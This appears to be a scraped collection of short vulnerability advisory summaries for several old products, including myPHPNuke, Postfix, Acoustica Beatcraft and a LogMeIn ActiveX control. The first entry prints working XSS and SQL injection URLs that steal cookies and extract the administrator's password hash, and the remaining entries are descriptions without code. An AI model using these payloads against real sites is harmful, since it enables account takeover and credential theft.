There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke. XSS: http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E SQL Injection: http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1 With this query you will receive login and password (hash) of administrator. Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets).
This PoC exploits a local privilege escalation vulnerability in Postfix. It creates a hardlink to a symlink, which is not dereferenced, and then creates an alias in the alias maps. It then sends a mail to the root user, which is then used to modify the /etc/passwd file.
A vulnerability exists in Words tag script v1.2 (word) which allows an attacker to inject arbitrary SQL commands via the 'word' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to sensitive information from the database, execute arbitrary commands on the server, or even gain access to the server itself.
An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains malicious SQL statements that are executed in the backend database. This can allow an attacker to gain access to sensitive information such as usernames, passwords, and other sensitive data stored in the database.
This exploit allows an attacker to read and write to the registry and also read files. The exploit uses the FT.RegistryValue and FT.GetTextFile functions to read and write to the registry and read files respectively.
Acoustica Beatcraft contains a buffer prone to exploitation via an overly long string. The buffer contains the 'title' of the 'instruments' one can insert into a Beatcraft project. This exploit is a bit unstable in the fact that, to properly exploit it, one must open Beatcraft firstly, then proceed to open the exploit file from within Beatcraft. Simply double clicking the file will result in a simple DoS scenario.
This vulnerability causes Explorer.exe to crash and causes Internet explorer to close silently. It is a work in progress and the author is still trying to make it run arbitrary code.
This exploit is based off of n00b's findings and is used to execute arbitrary code on the vulnerable system. It is a buffer overflow exploit which takes advantage of a vulnerability in Acoustica MP3 CD Burner version 4.51 Build 147 and possibly older versions. It is tested on Windows XP SP3 Fully Patched.
A remote buffer overflow vulnerability exists in the Najdi.si Toolbar. The vulnerability is caused due to a boundary error when handling overly long URLs. This can be exploited to cause a stack-based buffer overflow via a specially crafted URL passed to the vulnerable application. Successful exploitation may allow execution of arbitrary code.
A vulnerability exists in LogMeIn Remote Access Utility ActiveX component (RACtrl.dll) which can be exploited to cause a denial of service. The vulnerability is caused due to a boundary error when handling the 'fgcolor', 'bgcolor' and 'fmcolor' properties. This can be exploited to corrupt memory by supplying a specially crafted value to the affected properties. Successful exploitation may allow execution of arbitrary code, but this has not been confirmed.
Services By CQR